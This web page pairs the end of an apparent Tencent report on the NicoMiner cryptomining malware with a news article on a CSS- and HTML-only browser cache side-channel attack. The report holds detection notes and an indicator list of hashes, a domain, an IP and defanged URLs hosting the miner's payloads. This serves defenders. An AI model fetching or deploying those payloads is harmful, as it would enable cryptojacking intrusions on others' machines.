腾讯T-Sec 安全运营中心 (SOC) 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)NicoMiner相关联的IOCs已支持识别检测; 2)已支持检测以下漏洞利用攻击: Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 (iOA) 1)已支持NicoMiner关联模块的检测告警,查杀清理。 零信任无边界访问控制系统(iOA)是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念,推出的网络边界访问管控整体解决方案。更多资料,可参考:https://s.tencent.com/product/ioa/index.html   IOCs Domain raw.nicosoft.org IP 154.91.1.27(ZoomEye搜索结果) Md5 Java df840b3decb91ae7480b2ccf95df9f9a Java dba1ef891aed1c769014a0d3aa5ed321 Java 1aa6a96f4a6fcc5c4309f2406d3479ba CONHOST.EXE 32b8a44ee3214ab56e1edbaa016918c7 CONHOST.EXE 0a31ae5882697455a071f73191ed661c CONHOST.EXE 2c31a7243f00afe467e2994d3c249024 conhost.exe bf825890526386dd96e82d2ce57e0303 SqlTools.exe 84757d6b1a94021f246d14b37c1015b8 task.exe 52cd60289ffe8e14c5aa6cb8ea8ad730 LinuxTF f453b9c09ea2fb6a194b5d81d515b0e8 URL hxxp://raw.nicosoft.org/SqlTools.exe hxxp://nicosoft.org/SqlTools.exe hxxp://154.91.1.27/SqlTools.exe hxxp://nicosoft.org/sqltools.exe hxxp://154.91.1.27/sqltools.exe hxxp://raw.nicosoft.org/java hxxp://raw.nicosoft.org/conhost.exe hxxp://154.91.1.27/task.exe hxxp://154.91.1.27/conhost.exe hxxp://154.91.1.27/WinRing0x64.sys hxxp://154.91.1.27/LinuxTF   参考链接: https://s.tencent.com/research/report/1206.html https://s.tencent.com/research/report/1175.html https://cloud.tencent.com/developer/article/1472565  

安全团队演示首个基于浏览器的旁道攻击

一支安全研究团队近日展示了基于浏览器的全新旁道攻击(Side-channel attack),即便是 JavaScript 在被阻止的情况下也能生效。目前包括英特尔酷睿、AMD Ryzen、三星 Exynos 甚至于苹果自研芯片 M1 这些硬件平台都受到影响。 为了演示该攻击,安全专家开发了一系列对 JavaScript 功能依赖性降低的攻击,这导致了“首个基于浏览器的旁道攻击”,完全由层叠样式表(CSS)和HTML构建,即使在脚本执行被完全阻止时也能工作。 研究人员表示,这个漏洞甚至可以导致微架构站点指纹攻击。站点指纹攻击允许窃听者通过利用目标数据包序列的特征来确定目标的网络活动。这也就有效地无视了大多数隐私保护技术的应用,如VPN、代理,甚至TOR。 根据该演示背后的研究人员发表的一篇论文,Javascript 已经成为进行旁道攻击的一种流行方式。不过通常情况下浏览器会采用某些方法禁止攻击者精确测量时间,而这是基于 JavaScript 的旁道攻击必不可少的。 论文中写道:“旁道攻击者试图绕过这些限制,通过利用其他浏览器API(如消息传递或多线程)创建具有不同精度的临时计时器”。在浏览器为阻止基于 Javascript 的侧通道攻击所做的所有努力中,最简单的选择是完全禁用 Javascript。例如,苹果在 macOS 上的 Safari 设置中提供了一个完全禁用 Javascript 的选项,以此来减轻此类攻击。 尽管如此,来自美国、澳大利亚和以色列的大学研究人员展示的新形式的攻击依然是有效的,因为它只依赖于 CSS 和 HTML,这使它成为第一个在苹果 M1 芯片上工作的旁道攻击。根据研究论文,分析的重点是 Prime + Probe ,这是一种缓存旁道攻击,它拥有检测目标访问哪些缓存集的能力,然后可以用来洞察目标的情况。 研究人员表示:“除了受到防御措施的影响,微架构攻击还受到消费类设备硬件多样化程度提高的影响。高端处理器市场过去一直由英特尔主导,但过去几年,其他替代产品的普及率越来越高,比如AMD的Zen架构、三星的Exynos,以及最近推出的苹果M1内核”的。 为此研究人员对 AMD 的 Ryzen、三星的 Exynos 和苹果的 M1 芯片进行了攻击评估。结果表明,和英特尔的同类产品相比,有时候攻击在苹果和三星这些新型 CPU 上更加有效,这可能是由于它们的缓存替换策略更简单。 攻击的成功程度取决于目标架构和内部采用的防御措施。该攻击甚至可以在采用英特尔、AMD、三星和苹果 M1 芯片的设备上,针对包括Tor浏览器、Chrome Zero 等在内的强硬浏览器环境发挥作用。 研究人员接着通知了受影响的芯片厂商。苹果公司回应称,公开披露他们的研究结果不会引起任何担忧。对此安全团队表示:“我们推测M1架构利用了不太先进的缓存启发式方法,因此,我们的攻击所执行的简单化内存扫描在这些设备上比在英特尔架构上更能刷新整个缓存”。 团队继续表示:“缓存攻击无法通过降低定时器分辨率,废除定时器、线程或数组,甚至完全禁用脚本支持来防止。这意味着,任何与连接到不受信任网站的浏览器共享缓存资源的秘密承载进程都有潜在的暴露风险”。           (消息来源:cnBeta;封面源自网络)